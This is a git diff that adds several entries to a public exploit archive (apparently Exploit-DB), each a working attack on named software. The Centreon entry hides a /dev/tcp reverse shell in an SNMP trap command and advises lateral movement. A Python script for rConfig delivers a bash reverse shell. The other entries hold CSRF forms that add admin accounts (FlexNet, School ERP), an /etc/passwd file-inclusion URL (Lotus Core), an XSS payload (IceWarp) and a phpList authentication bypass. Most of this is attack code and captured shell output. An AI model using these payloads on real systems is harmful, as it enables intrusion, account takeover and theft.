+└──╼ #nc -lnvp 1234
+Ncat: Version 7.50 ( https://nmap.org/ncat )
+Ncat: Listening on :::1234
+Ncat: Listening on 0.0.0.0:1234
+Ncat: Connection from 127.0.0.1.
+Ncat: Connection from 127.0.0.1:49184.
+whoami
+apache
+id
+uid=48(apache) gid=48(apache) groups=48(apache),990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
+___________________________________________________________________
\ No newline at end of file
diff --git a/exploits/php/webapps/47978.txt b/exploits/php/webapps/47978.txt
new file mode 100644
index 000000000..9a312ba8c
--- /dev/null
+++ b/exploits/php/webapps/47978.txt
@@ -0,0 +1,160 @@
+# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution 
+# Date: 2020-01-29
+# Exploit Author: Fabien AUNAY, Omri Baso
+# Vendor Homepage: https://www.centreon.com/
+# Software Link: https://github.com/centreon/centreon
+# Version: 19.10.5
+# Tested on: CentOS 7
+# CVE : -
+
+###########################################################################################################
+Centreon 19.10.5 Remote Command Execution centreontrapd
+
+Trusted by SMBs and Fortune 500 companies worldwide.
+An industry reference in IT Infrastructure monitoring for the enterprise.
+Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
+Presence in Toronto and Luxembourg.
+Deployed in diverse sectors:
+- IT & telecommunication
+- Transportation
+- Government
+- Heath care
+- Retail
+- Utilities
+- Finance & Insurance
+- Aerospace & Defense
+- Manufacturing
+- etc.
+
+It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.
+
+
+Steps:
+Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3
+Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
+Objective 3 : Assign service trap relation
+Objective 4 : Get centreon id reverse shell
+
+###########################################################################################################
+
+# Objective 1 : Create or use SNMP trap OID with special command in action 3
+- Configuration  >  SNMP Traps
+
+[+] Trap name *     : linkDown
+[+] OID *        : .1.3.6.1.6.3.1.1.5.3
+[+] Special Command    : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
+
+
+# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
+- Configuration  >  Services  >  Services by host
+
+[+] Description *        : TRAP RCE
+[+] Linked with Hosts *        : YOUR-LINKED-HOST
+[+] Check Command *        : App-Monitoring-Centreon-Service-Dummy
+[+] DUMMYSTATUS            : 0
+[+] DUMMYOUTPUT            : 0
+[+] Passive Checks Enabled     : YES
+[+] Is Volatile            : YES
+[+] Service Trap Relation    : Generic - linkDown
+
+
+# Objective 3 : Assign service trap relation
+- Configuration  >  SNMP Traps
+- linkDown
+- Relations
+
+[+] Linked services        : YOUR-LINKED-HOST - SERVICE DESCRIPTION
+
+reload Central
+Reload snmp config
+
+
+# Objective 4 : Get centreon id reverse shell and think lateral
+
+[+] Send your trap
+snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
+
+TIP: centreontrapd logfile:
+2020-01-29 02:52:33 - DEBUG - 340 - Reading trap.  Current time: Wed Jan 29 02:52:33 2020
+2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance).  Will attempt to translate to a numerical OID
+2020-01-29 02:52:33 - DEBUG - 340 -   Translated to .1.3.6.1.2.1.1.3.0
+2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0).  Will attempt to translate to a numerical OID
+...
+2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
+...
+2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
+2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
+..
+
+
+NOTE: Read the doc !!!
+https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen
+
+The centreon id user shares configurations and instructions with satellite collectors trough SSH.
+No passphrase used.
+This allows you to move around the infrastructure after your RCE.
+
+
+POC:
+
+snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
+
+nc -lvnp 12345
+Ncat: Version 7.50
+Ncat: Listening on :::12345
+Ncat: Listening on 0.0.0.0:12345
+Ncat: Connection from 127.0.0.1.
+Ncat: Connection from 127.0.0.1:38470.
+id
+uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
+sudo -l
+Matching Defaults entries for centreon on centreonlab:
+    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
+    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
+
+User centreon may run the following commands on centreonlab:
+    (root) NOPASSWD: /sbin/service centreontrapd start
+    (root) NOPASSWD: /sbin/service centreontrapd stop
+    (root) NOPASSWD: /sbin/service centreontrapd restart
+    (root) NOPASSWD: /sbin/service centreontrapd reload
+    (root) NOPASSWD: /usr/sbin/service centreontrapd start
+    (root) NOPASSWD: /usr/sbin/service centreontrapd stop
+    (root) NOPASSWD: /usr/sbin/service centreontrapd restart
+    (root) NOPASSWD: /usr/sbin/service centreontrapd reload
+    (root) NOPASSWD: /sbin/service centengine start
+    (root) NOPASSWD: /sbin/service centengine stop
+    (root) NOPASSWD: /sbin/service centengine restart
+    (root) NOPASSWD: /sbin/service centengine reload
+    (root) NOPASSWD: /usr/sbin/service centengine start
+    (root) NOPASSWD: /usr/sbin/service centengine stop
+    (root) NOPASSWD: /usr/sbin/service centengine restart
+    (root) NOPASSWD: /usr/sbin/service centengine reload
+    (root) NOPASSWD: /bin/systemctl start centengine
+    (root) NOPASSWD: /bin/systemctl stop centengine
+    (root) NOPASSWD: /bin/systemctl restart centengine
+    (root) NOPASSWD: /bin/systemctl reload centengine
+    (root) NOPASSWD: /usr/bin/systemctl start centengine
+    (root) NOPASSWD: /usr/bin/systemctl stop centengine
+    (root) NOPASSWD: /usr/bin/systemctl restart centengine
+    (root) NOPASSWD: /usr/bin/systemctl reload centengine
+    (root) NOPASSWD: /sbin/service cbd start
+    (root) NOPASSWD: /sbin/service cbd stop
+    (root) NOPASSWD: /sbin/service cbd restart
+    (root) NOPASSWD: /sbin/service cbd reload
+    (root) NOPASSWD: /usr/sbin/service cbd start
+    (root) NOPASSWD: /usr/sbin/service cbd stop
+    (root) NOPASSWD: /usr/sbin/service cbd restart
+    (root) NOPASSWD: /usr/sbin/service cbd reload
+    (root) NOPASSWD: /bin/systemctl start cbd
+    (root) NOPASSWD: /bin/systemctl stop cbd
+    (root) NOPASSWD: /bin/systemctl restart cbd
+    (root) NOPASSWD: /bin/systemctl reload cbd
+    (root) NOPASSWD: /usr/bin/systemctl start cbd
+    (root) NOPASSWD: /usr/bin/systemctl stop cbd
+    (root) NOPASSWD: /usr/bin/systemctl restart cbd
+    (root) NOPASSWD: /usr/bin/systemctl reload cbd
\ No newline at end of file
diff --git a/exploits/php/webapps/47982.py b/exploits/php/webapps/47982.py
new file mode 100755
index 000000000..2962a7e76
--- /dev/null
+++ b/exploits/php/webapps/47982.py
@@ -0,0 +1,75 @@
+# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
+# Date: 2019-11-07
+# CVE-2019-19509
+# Exploit Author: vikingfr
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
+# Version: tested v3.9.3
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
+# rconfig - CVE-2019-19509 - Web authenticated RCE
+# [+] Logged in successfully, triggering the payload...
+# [+] Check your listener !
+# ...
+# $ nc -nvlp 8081
+# listening on [any] 8081 ...
+# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
+# bash: no job control in this shell
+# bash-4.2$ id
+# id
+# uid=48(apache) gid=48(apache) groups=48(apache)
+# bash-4.2$ 
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print ("rconfig - CVE-2019-19509 - Web authenticated RCE")
+
+if len(sys.argv) != 6:
+    print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
+    exit()
+
+target = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)
+
+request = requests.session()
+
+login_info = {
+    "user": username,
+    "pass": password,
+    "sublogin": 1
+}
+
+login_request = request.post(
+    target+"/lib/crud/userprocess.php",
+     login_info,
+     verify=False,
+     allow_redirects=True
+ )
+
+dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
+
+if dashboard_request.status_code == 200:
+    print ("[+] Logged in successfully, triggering the payload...")
+    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
+    print ("[+] Check your listener !")
+    exploit_req = request.get(encoded_request)
+
+elif dashboard_request.status_code == 302:
+    print ("[-] Wrong credentials !")
+    exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/47985.txt b/exploits/php/webapps/47985.txt
new file mode 100644
index 000000000..51c293070
--- /dev/null
+++ b/exploits/php/webapps/47985.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
+# Google Dork: N/A
+# Date: 2020-01-31
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: http://lotuscore.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
+# Version: 1.0.1
+# Tested on: Windows 7 x86
+# CVE : N/A
+
+
+The vulnerability occurs on line 65 of the index.php file, first we can provide the page_slug parameter,
+if it's not set by the user it is set to index, but if the user sets the parameter via a GET or POST request,
+it checks if the file exists and if it exists, it performs an unsanitized inclusion.
+
+-----------------------------------------------------------------------------
+
+if(!$_REQUEST['page_slug']){
+	$_REQUEST['page_slug'] = 'index';
+}
+if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
+	include('system/plugins/'.$_REQUEST['page_slug'].'.php');
+}else{
+	include("system/plugins/error/404.php");
+}
+
+------------------------------------------------------------------------------
+
+
+The PHP file appends .php to anything we provide as page_slug parameter so to include any file we must use a nullbyte.
+Note that you need to be authenticated to exploit this. The explotation would be like this:
+
+http://site:80/index.php?page_slug=../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/exploits/php/webapps/47986.txt b/exploits/php/webapps/47986.txt
new file mode 100644
index 000000000..82cd88c9a
--- /dev/null
+++ b/exploits/php/webapps/47986.txt
@@ -0,0 +1,63 @@
+# Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
+# Date: 2019-12-29 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.flexerasoftware.com/
+# Software : FlexNet Publisher
+# Product Version:  v11.12.1
+# Product : https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html
+# Product Version : https://helpnet.flexerasoftware.com/eol/flexnet-publisher.htm 
+# Vulernability Type : Cross-Site Request Forgery (Add Local Admin)
+# Vulenrability : Cross-Site Request Forgery
+# Reference : https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/CVE-2019-8962-remediated-in-FlexNet-Publisher/ta-p/131062
+# CVE : N/A
+
+HTTP Request :
+
+POST /users HTTP/1.1
+Host: SERVER:8888
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://SERVER:8888/users?event=create&licenseTab=
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 197
+Connection: close
+Cookie: Webstation-Locale=en-US; sess_lmgrd=32CFC53815147D5362ACAAF100000001; GUEST=1; UID=GUEST; FL=1; FA=1; DM=; user_type_lmgrd=0
+Upgrade-Insecure-Requests: 1
+
+licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin&checksum=1d00c20815e84c31&Create=Create
+
+HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Sun, 29 Dec 2019 08:38:14 GMT
+Server: Apache
+X-Frame-Options: SAMEORIGIN
+Cache-Control: no-cache, no-store
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 14434
+
+CSRF HTML PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://SERVER:8888/users" method="POST">
+      <input type="hidden" name="licenseTab" value="" />
+      <input type="hidden" name="selected" value="" />
+      <input type="hidden" name="userType" value="local&#45;admin" />
+      <input type="hidden" name="userName" value="ISMAILTASDELEN" />
+      <input type="hidden" name="firstName" value="Ismail" />
+      <input type="hidden" name="lastName" value="Tasdelen" />
+      <input type="hidden" name="password2" value="Test12345" />
+      <input type="hidden" name="confirm" value="Test12345" />
+      <input type="hidden" name="accountType" value="admin" />
+      <input type="hidden" name="checksum" value="1d00c20815e84c31" />
+      <input type="hidden" name="Create" value="Create" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47988.txt b/exploits/php/webapps/47988.txt
new file mode 100644
index 000000000..578612926
--- /dev/null
+++ b/exploits/php/webapps/47988.txt
@@ -0,0 +1,34 @@
+# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
+# Date: 2020-01-27
+# Author: Lutfu Mert Ceylan
+# Vendor Homepage: www.icewarp.com
+# Tested on: Windows 10
+# Versions: 11.4.4.1 and before
+# Vulnerable Parameter: "color" (Get Method)
+# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
+# CVE: CVE-2020-8512
+
+# Notes:
+
+# An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and
+# before)to send a malicious script to an unsuspecting Admins or users. The
+# end admins or useras browser has no way to know that the script should not
+# be trusted, and will execute the script. Because it thinks the script came
+# from a trusted source, the malicious script can access any cookies, session
+# tokens, or other sensitive information retained by the browser and used
+# with that site. These scripts can even rewrite the content of the HTML
+# page. Even an attacker can easily place users in social engineering through
+# this vulnerability and create a fake field.
+
+# PoC:
+
+# Go to Sign-in page through this path: http://localhost/webmail/ or
+http://localhost:32000/webmail/
+
+# Add the "color" parameter to the URL and write malicious code, Example:
+http://localhost/webmail/?color="><svg/onload=alert(1)>
+
+# When the user goes to the URL, the malicious code is executed
+
+Example Vulnerable URL: http://localhost/webmail/?color=
+"><svg/onload=alert(1)>
\ No newline at end of file
diff --git a/exploits/php/webapps/47989.php b/exploits/php/webapps/47989.php
new file mode 100644
index 000000000..0fff0be48
--- /dev/null
+++ b/exploits/php/webapps/47989.php
@@ -0,0 +1,90 @@
+# Exploit Title: phpList 3.5.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-02-03
+# Exploit Author: Suvadip Kar
+# Author Contact: https://twitter.com/spidersec
+# Vendor Homepage: https://www.phplist.org
+# Software Link: https://www.phplist.org/download-phplist/
+# Version: 3.5.0
+# Tested on: Linux
+# CVE : CVE-2020-8547
+
+Background of the Vulnerability :
+
+Php loose comparison '==' compares two operands by converting them to integers even if they are strings.
+
+EXAMPLE CODE:
+
+ <?php
+ var_dump(hash('sha256', 'TyNOQHUS') == '0e66298694359207596086558843543959518835691168370379069085300385');
+ var_dump(hash('sha256', '34250003024812') == '0e66298694359207596086558843543959518835691168370379069085300385');
+ ?>
+
+OUTPUT:
+
+bool(true)
+bool(true)
+
+Vulnerable code:
+
+GITHUB: https://github.com/phpList/phplist3/blob/master/public_html/lists/admin/phpListAdminAuthentication.php
+-----
+if(empty($login)||($password=="")){
+    return array(0, s('Please enter your credentials.'));
+}
+if ($admindata['disabled']) {
+    return array(0, s('your account has been disabled'));
+}
+if (//Password validation.
+    !empty($passwordDB) && $encryptedPass == $passwordDB // Vulnerable because loose comparison is used
+)
+    return array($admindata['id'], 'OK');
+ else {
+    if (!empty($GLOBALS['admin_auth_module'])) {
+        Error(s('Admin authentication has changed, please update your admin module'),
+            'https://resources.phplist.com/documentation/errors/adminauthchange');
+        return;
+        }
+return array(0, s('incorrect password'));
+
+}
+-------
+
+Steps to reproduce:
+
+ 1. Set the string 'TyNOQHUS' as password for username 'admin'. Its sha256 value is 0e66298694359207596086558843543959518835691168370379069085300385.
+
+ 2. Now navigate to endpoint '/admin' and try to login with username 'admin' password 'TyNOQHUS'.
+
+ 3. User Logged in with valid password.
+
+ 4. Now logout from the application and try to login with username 'admin' password '34250003024812'.
+
+ 5. User Logged in, without valid password.
+
+ 6. Authentication bypassed because of PHP loose comparison.
+
+ FIX: This vulnerability can be fixed by using strict comparison (===) in place of loose comparison.
+ -----
+ if(empty($login)||($password=="")){
+     return array(0, s('Please enter your credentials.'));
+ }
+ if ($admindata['disabled']) {
+     return array(0, s('your account has been disabled'));
+ }
+ if (//Password validation.
+     !empty($passwordDB) && $encryptedPass === $passwordDB // Fixed by using strict comparison '==='.
+ )
+     return array($admindata['id'], 'OK');
+  else {
+     if (!empty($GLOBALS['admin_auth_module'])) {
+         Error(s('Admin authentication has changed, please update your admin module'),
+             'https://resources.phplist.com/documentation/errors/adminauthchange');
+         return;
+         }
+ return array(0, s('incorrect password'));
+
+ }
+ -------
+
+Additional Resource: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/47992.txt b/exploits/php/webapps/47992.txt
new file mode 100644
index 000000000..33be359ce
--- /dev/null
+++ b/exploits/php/webapps/47992.txt
@@ -0,0 +1,430 @@
+# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
+# Date: 2020-01-31
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
+# Version ERP-Ultimate
+# CVE: CVE-2020-8504,CVE-2020-8505
+# Tested on Windows 10/Kali Rolling
+# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery 
+# that leads to admin account creation and arbitrary user deletion.
+# Proof of Concept for the Admin Account Creation:
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">
+      <input type="hidden" name="admin&#95;fname" value="Admin" />
+      <input type="hidden" name="admin&#95;lname" value="Tester" />
+      <input type="hidden" name="admin&#95;username" value="testing" />
+      <input type="hidden" name="admin&#95;password" value="testing123" />
+      <input type="hidden" name="admin&#95;password2" value="testing123" />
+      <input type="hidden" name="admin&#95;email" value="test&#64;test&#46;com" />
+      <input type="hidden" name="admin&#95;phoneno" value="9999999999" />
+      <input type="hidden" name="adminlevel" value="" />
+      <input type="hidden" name="admin&#95;more" value="Test" />
+      <input type="hidden" name="1&#95;p" value="1&#95;p" />
+      <input type="hidden" name="1&#95;1" value="1&#95;1" />
+      <input type="hidden" name="1&#95;2" value="1&#95;2" />
+      <input type="hidden" name="1&#95;4" value="1&#95;4" />
+      <input type="hidden" name="1&#95;3" value="1&#95;3" />
+      <input type="hidden" name="2&#95;p" value="2&#95;p" />
+      <input type="hidden" name="2&#95;1" value="2&#95;1" />
+      <input type="hidden" name="2&#95;2" value="2&#95;2" />
+      <input type="hidden" name="2&#95;3" value="2&#95;3" />
+      <input type="hidden" name="2&#95;4" value="2&#95;4" />
+      <input type="hidden" name="2&#95;5" value="2&#95;5" />
+      <input type="hidden" name="2&#95;6" value="2&#95;6" />
+      <input type="hidden" name="2&#95;7" value="2&#95;7" />
+      <input type="hidden" name="2&#95;8" value="2&#95;8" />
+      <input type="hidden" name="2&#95;9" value="2&#95;9" />
+      <input type="hidden" name="2&#95;10" value="2&#95;10" />
+      <input type="hidden" name="2&#95;11" value="2&#95;11" />
+      <input type="hidden" name="2&#95;12" value="2&#95;12" />
+      <input type="hidden" name="2&#95;13" value="2&#95;13" />
+      <input type="hidden" name="2&#95;14" value="2&#95;14" />
+      <input type="hidden" name="2&#95;15" value="2&#95;15" />
+      <input type="hidden" name="2&#95;20" value="2&#95;20" />
+      <input type="hidden" name="2&#95;18" value="2&#95;18" />
+      <input type="hidden" name="2&#95;19" value="2&#95;19" />
+      <input type="hidden" name="3&#95;p" value="3&#95;p" />
+      <input type="hidden" name="3&#95;1" value="3&#95;1" />
+      <input type="hidden" name="3&#95;2" value="3&#95;2" />
+      <input type="hidden" name="3&#95;3" value="3&#95;3" />
+      <input type="hidden" name="3&#95;5" value="3&#95;5" />
+      <input type="hidden" name="3&#95;4" value="3&#95;4" />
+      <input type="hidden" name="4&#95;p" value="4&#95;p" />
+      <input type="hidden" name="5&#95;p" value="5&#95;p" />
+      <input type="hidden" name="5&#95;1" value="5&#95;1" />
+      <input type="hidden" name="5&#95;3" value="5&#95;3" />
+      <input type="hidden" name="5&#95;2" value="5&#95;2" />
+      <input type="hidden" name="5&#95;5" value="5&#95;5" />
+      <input type="hidden" name="5&#95;6" value="5&#95;6" />
+      <input type="hidden" name="6&#95;p" value="6&#95;p" />
+      <input type="hidden" name="7&#95;p" value="7&#95;p" />
+      <input type="hidden" name="7&#95;1" value="7&#95;1" />
+      <input type="hidden" name="7&#95;2" value="7&#95;2" />
+      <input type="hidden" name="7&#95;3" value="7&#95;3" />
+      <input type="hidden" name="7&#95;4" value="7&#95;4" />
+      <input type="hidden" name="7&#95;5" value="7&#95;5" />
+      <input type="hidden" name="8&#95;p" value="8&#95;p" />
+      <input type="hidden" name="8&#95;1" value="8&#95;1" />
+      <input type="hidden" name="8&#95;2" value="8&#95;2" />
+      <input type="hidden" name="8&#95;3" value="8&#95;3" />
+      <input type="hidden" name="8&#95;101" value="8&#95;101" />
+      <input type="hidden" name="8&#95;4" value="8&#95;4" />
+      <input type="hidden" name="8&#95;5" value="8&#95;5" />
+      <input type="hidden" name="8&#95;6" value="8&#95;6" />
+      <input type="hidden" name="8&#95;16" value="8&#95;16" />
+      <input type="hidden" name="8&#95;102" value="8&#95;102" />
+      <input type="hidden" name="8&#95;7" value="8&#95;7" />
+      <input type="hidden" name="8&#95;8" value="8&#95;8" />
+      <input type="hidden" name="8&#95;9" value="8&#95;9" />
+      <input type="hidden" name="8&#95;17" value="8&#95;17" />
+      <input type="hidden" name="8&#95;103" value="8&#95;103" />
+      <input type="hidden" name="8&#95;104" value="8&#95;104" />
+      <input type="hidden" name="8&#95;10" value="8&#95;10" />
+      <input type="hidden" name="8&#95;11" value="8&#95;11" />
+      <input type="hidden" name="8&#95;12" value="8&#95;12" />
+      <input type="hidden" name="8&#95;18" value="8&#95;18" />
+      <input type="hidden" name="8&#95;105" value="8&#95;105" />
+      <input type="hidden" name="8&#95;106" value="8&#95;106" />
+      <input type="hidden" name="8&#95;13" value="8&#95;13" />
+      <input type="hidden" name="8&#95;14" value="8&#95;14" />
+      <input type="hidden" name="8&#95;15" value="8&#95;15" />
+      <input type="hidden" name="8&#95;19" value="8&#95;19" />
+      <input type="hidden" name="8&#95;107" value="8&#95;107" />
+      <input type="hidden" name="8&#95;108" value="8&#95;108" />
+      <input type="hidden" name="9&#95;p" value="9&#95;p" />
+      <input type="hidden" name="9&#95;1" value="9&#95;1" />
+      <input type="hidden" name="9&#95;17" value="9&#95;17" />
+      <input type="hidden" name="9&#95;18" value="9&#95;18" />
+      <input type="hidden" name="9&#95;19" value="9&#95;19" />
+      <input type="hidden" name="9&#95;2" value="9&#95;2" />
+      <input type="hidden" name="9&#95;20" value="9&#95;20" />
+      <input type="hidden" name="9&#95;21" value="9&#95;21" />
+      <input type="hidden" name="9&#95;22" value="9&#95;22" />
+      <input type="hidden" name="9&#95;3" value="9&#95;3" />
+      <input type="hidden" name="9&#95;4" value="9&#95;4" />
+      <input type="hidden" name="9&#95;5" value="9&#95;5" />
+      <input type="hidden" name="9&#95;6" value="9&#95;6" />
+      <input type="hidden" name="9&#95;101" value="9&#95;101" />
+      <input type="hidden" name="9&#95;7" value="9&#95;7" />
+      <input type="hidden" name="9&#95;102" value="9&#95;102" />
+      <input type="hidden" name="9&#95;8" value="9&#95;8" />
+      <input type="hidden" name="9&#95;103" value="9&#95;103" />
+      <input type="hidden" name="9&#95;24" value="9&#95;24" />
+      <input type="hidden" name="9&#95;25" value="9&#95;25" />
+      <input type="hidden" name="9&#95;33" value="9&#95;33" />
+      <input type="hidden" name="9&#95;23" value="9&#95;23" />
+      <input type="hidden" name="9&#95;11" value="9&#95;11" />
+      <input type="hidden" name="9&#95;13" value="9&#95;13" />
+      <input type="hidden" name="9&#95;27" value="9&#95;27" />
+      <input type="hidden" name="9&#95;14" value="9&#95;14" />
+      <input type="hidden" name="9&#95;29" value="9&#95;29" />
+      <input type="hidden" name="9&#95;30" value="9&#95;30" />
+      <input type="hidden" name="9&#95;31" value="9&#95;31" />
+      <input type="hidden" name="9&#95;15" value="9&#95;15" />
+      <input type="hidden" name="9&#95;16" value="9&#95;16" />
+      <input type="hidden" name="9&#95;32" value="9&#95;32" />
+      <input type="hidden" name="10&#95;p" value="10&#95;p" />
+      <input type="hidden" name="10&#95;1" value="10&#95;1" />
+      <input type="hidden" name="10&#95;2" value="10&#95;2" />
+      <input type="hidden" name="10&#95;3" value="10&#95;3" />
+      <input type="hidden" name="10&#95;4" value="10&#95;4" />
+      <input type="hidden" name="10&#95;5" value="10&#95;5" />
+      <input type="hidden" name="10&#95;6" value="10&#95;6" />
+      <input type="hidden" name="10&#95;7" value="10&#95;7" />
+      <input type="hidden" name="10&#95;8" value="10&#95;8" />
+      <input type="hidden" name="10&#95;11" value="10&#95;11" />
+      <input type="hidden" name="10&#95;9" value="10&#95;9" />
+      <input type="hidden" name="10&#95;10" value="10&#95;10" />
+      <input type="hidden" name="10&#95;12" value="10&#95;12" />
+      <input type="hidden" name="11&#95;p" value="11&#95;p" />
+      <input type="hidden" name="11&#95;1" value="11&#95;1" />
+      <input type="hidden" name="11&#95;2" value="11&#95;2" />
+      <input type="hidden" name="11&#95;3" value="11&#95;3" />
+      <input type="hidden" name="11&#95;4" value="11&#95;4" />
+      <input type="hidden" name="11&#95;5" value="11&#95;5" />
+      <input type="hidden" name="11&#95;6" value="11&#95;6" />
+      <input type="hidden" name="11&#95;7" value="11&#95;7" />
+      <input type="hidden" name="11&#95;8" value="11&#95;8" />
+      <input type="hidden" name="11&#95;9" value="11&#95;9" />
+      <input type="hidden" name="11&#95;10" value="11&#95;10" />
+      <input type="hidden" name="11&#95;11" value="11&#95;11" />
+      <input type="hidden" name="11&#95;12" value="11&#95;12" />
+      <input type="hidden" name="11&#95;13" value="11&#95;13" />
+      <input type="hidden" name="11&#95;14" value="11&#95;14" />
+      <input type="hidden" name="11&#95;15" value="11&#95;15" />
+      <input type="hidden" name="11&#95;16" value="11&#95;16" />
+      <input type="hidden" name="11&#95;17" value="11&#95;17" />
+      <input type="hidden" name="11&#95;18" value="11&#95;18" />
+      <input type="hidden" name="11&#95;19" value="11&#95;19" />
+      <input type="hidden" name="11&#95;20" value="11&#95;20" />
+      <input type="hidden" name="11&#95;21" value="11&#95;21" />
+      <input type="hidden" name="11&#95;23" value="11&#95;23" />
+      <input type="hidden" name="11&#95;101" value="11&#95;101" />
+      <input type="hidden" name="11&#95;102" value="11&#95;102" />
+      <input type="hidden" name="11&#95;22" value="11&#95;22" />
+      <input type="hidden" name="11&#95;103" value="11&#95;103" />
+      <input type="hidden" name="11&#95;104" value="11&#95;104" />
+      <input type="hidden" name="12&#95;p" value="12&#95;p" />
+      <input type="hidden" name="12&#95;1" value="12&#95;1" />
+      <input type="hidden" name="12&#95;2" value="12&#95;2" />
+      <input type="hidden" name="12&#95;3" value="12&#95;3" />
+      <input type="hidden" name="12&#95;4" value="12&#95;4" />
+      <input type="hidden" name="12&#95;5" value="12&#95;5" />
+      <input type="hidden" name="12&#95;11" value="12&#95;11" />
+      <input type="hidden" name="12&#95;6" value="12&#95;6" />
+      <input type="hidden" name="12&#95;7" value="12&#95;7" />
+      <input type="hidden" name="12&#95;8" value="12&#95;8" />
+      <input type="hidden" name="12&#95;12" value="12&#95;12" />
+      <input type="hidden" name="12&#95;9" value="12&#95;9" />
+      <input type="hidden" name="12&#95;10" value="12&#95;10" />
+      <input type="hidden" name="13&#95;p" value="13&#95;p" />
+      <input type="hidden" name="13&#95;1" value="13&#95;1" />
+      <input type="hidden" name="13&#95;2" value="13&#95;2" />
+      <input type="hidden" name="13&#95;3" value="13&#95;3" />
